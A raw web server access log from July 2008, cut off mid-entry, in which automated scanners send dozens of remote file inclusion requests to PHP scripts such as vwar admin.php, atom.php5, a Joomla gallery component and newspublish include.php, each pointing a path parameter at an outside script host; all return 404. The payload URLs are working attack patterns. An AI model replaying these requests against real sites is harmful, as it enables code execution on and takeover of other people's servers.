64.38.22.250 - - [27/Jul/2008:19:38:00 -0700] "GET /index.php?site=http://www.emark.sk/new/vnc/fastidio.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
218.188.33.2 - - [27/Jul/2008:19:38:12 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.summitcircle.com"
218.188.33.2 - - [27/Jul/2008:19:38:12 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:19:40:04 -0700] "GET /logs/access_080210.log//atom.php5?page=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:19:40:04 -0700] "GET //atom.php5?page=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:19:40:04 -0700] "GET /logs//atom.php5?page=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:19:40:11 -0700] "GET /logs/access_080210.log//atom.php5?page=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:19:40:11 -0700] "GET //atom.php5?page=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:19:40:11 -0700] "GET /logs//atom.php5?page=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
72.9.157.85 - - [27/Jul/2008:19:40:56 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://l1nuxgroup.by.ru/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
72.9.157.85 - - [27/Jul/2008:19:41:00 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://l1nuxgroup.by.ru/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:19:41:22 -0700] "GET /logs/access_080210.log//atom.php5?page=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:19:41:22 -0700] "GET //atom.php5?page=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:19:41:22 -0700] "GET /logs//atom.php5?page=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:19:41:24 -0700] "GET /logs/access_080210.log//atom.php5?page=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:19:41:24 -0700] "GET //atom.php5?page=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:19:41:24 -0700] "GET /logs//atom.php5?page=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
210.245.87.117 - - [27/Jul/2008:19:41:42 -0700] "GET /logs/access_080107.log//newspublish/include.php?path%5Bdocroot%5D=http://h1.ripway.com/anakbugis/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
210.245.87.117 - - [27/Jul/2008:19:41:43 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://h1.ripway.com/anakbugis/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
210.245.87.117 - - [27/Jul/2008:19:41:43 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://h1.ripway.com/anakbugis/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
210.245.87.117 - - [27/Jul/2008:19:41:44 -0700] "GET /logs/access_080107.log//newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
210.245.87.117 - - [27/Jul/2008:19:41:44 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
210.245.87.117 - - [27/Jul/2008:19:41:45 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
210.245.87.117 - - [27/Jul/2008:19:42:48 -0700] "GET /logs/access_071022.log//newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
210.245.87.117 - - [27/Jul/2008:19:42:54 -0700] "GET /logs/access_070826.log//newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "